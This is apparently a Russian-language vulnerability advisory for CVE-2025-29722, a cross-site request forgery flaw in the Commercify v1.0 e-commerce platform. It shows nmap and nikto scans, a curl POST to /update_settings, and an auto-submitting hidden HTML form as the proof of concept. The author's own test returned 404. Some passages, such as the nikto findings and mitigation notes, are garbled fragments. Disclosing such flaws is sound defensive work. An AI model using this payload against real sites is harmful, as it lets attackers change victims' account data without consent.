
Межсайтовая подделка запросов (CSRF) в Commercify v1.0
Обнаружено: David P.S Abraham (также известный как Davycipher)
CVE-2025-29722 был присвоен этой уязвимости организацией MITRE Corporation.
Уязвимость CSRF была обнаружена в Commercify v1.0, платформе электронной коммерции с открытым исходным кодом, разработанной @yassmittal. Приложение не имеет надлежащих механизмов защиты от CSRF на критических конечных точках, таких как /update_settings, что позволяет злоумышленникам создавать вредоносные запросы, изменяющие данные пользователя при выполнении с другого домена.
Сканирование nmap показало, что служба доступна через порт 5173, что указывает на возможный сервер разработки.
nmap -p 5173 localhost
Затем я просканировал приложение с помощью nikto, что выявило:
X-Frame-OptionsAccess-Control-Allow-Origin: *)Исследуя приложение, я заподозрил возможную конечную точку update_settings на основе функций панели пользователя. Я протестировал её с помощью:
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"
Хотя был возвращён 404 Not Found, это поведение может зависеть от окружения. В действующих развертываниях это может привести к полному манипулированию учетной записью.
Атака на основе HTML для эксплуатации уязвимости CSRF:
<form action="http://localhost:5173/update_settings" method="POST">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
SameSite*)SameSite=Strict или Lax для cookieDavid P.S. Abraham
Псевдоним: Davycipher